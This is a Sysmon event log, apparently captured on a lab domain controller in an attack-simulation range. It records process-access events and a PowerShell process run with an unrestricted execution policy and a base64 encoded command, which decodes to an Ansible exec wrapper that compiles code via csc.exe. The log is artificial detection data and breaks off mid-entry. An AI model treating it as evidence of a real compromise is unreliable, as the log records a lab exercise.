13:54:12.485{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003771Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.485{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003770Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.485{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003769Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.485{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003768Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.485{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003767Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.485{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8584-5FCF-BC00-000000009101}4884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003766Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.485{10ACEC4A-8584-5FCF-BB00-000000009101}4820876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-8584-5FCF-BC00-000000009101}4884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003765Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.499{10ACEC4A-8584-5FCF-BC00-000000009101}4884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES2601.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCFE1B689E386D430A88FC9658FA3CEC73.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8583-5FCF-F6EB-060000000000}0x6ebf60HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-8584-5FCF-BB00-000000009101}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\4bzgp5jb.cmdline" 10341000x80000000000000003764Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.392{10ACEC4A-8583-5FCF-B600-000000009101}45204532C:\Windows\system32\conhost.exe{10ACEC4A-8584-5FCF-BB00-000000009101}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003763Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.392{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003762Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.392{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003761Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.392{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003760Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.392{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003759Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.392{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003758Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.392{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003757Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.392{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003756Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.392{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003755Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.392{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003754Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.392{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8584-5FCF-BB00-000000009101}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003753Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.392{10ACEC4A-8583-5FCF-B900-000000009101}49682228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8584-5FCF-BB00-000000009101}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF81927B7BF) 154100x80000000000000003752Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.403{10ACEC4A-8584-5FCF-BB00-000000009101}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\4bzgp5jb.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8583-5FCF-F6EB-060000000000}0x6ebf60HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-8583-5FCF-B900-000000009101}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000003751Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.392{10ACEC4A-8583-5FCF-B900-000000009101}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\4bzgp5jb.cmdline2020-12-08 13:54:12.392 11241100x80000000000000003750Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:12.392{10ACEC4A-8583-5FCF-B900-000000009101}4968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\4bzgp5jb.dll2020-12-08 13:54:12.392 11241100x80000000000000003828Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:13.515{10ACEC4A-8585-5FCF-BE00-000000009101}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\342h1cqk\342h1cqk.dll2020-12-08 13:54:13.437 10341000x80000000000000003827Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:13.515{10ACEC4A-8583-5FCF-B600-000000009101}45204532C:\Windows\system32\conhost.exe{10ACEC4A-8585-5FCF-BF00-000000009101}656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003826Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 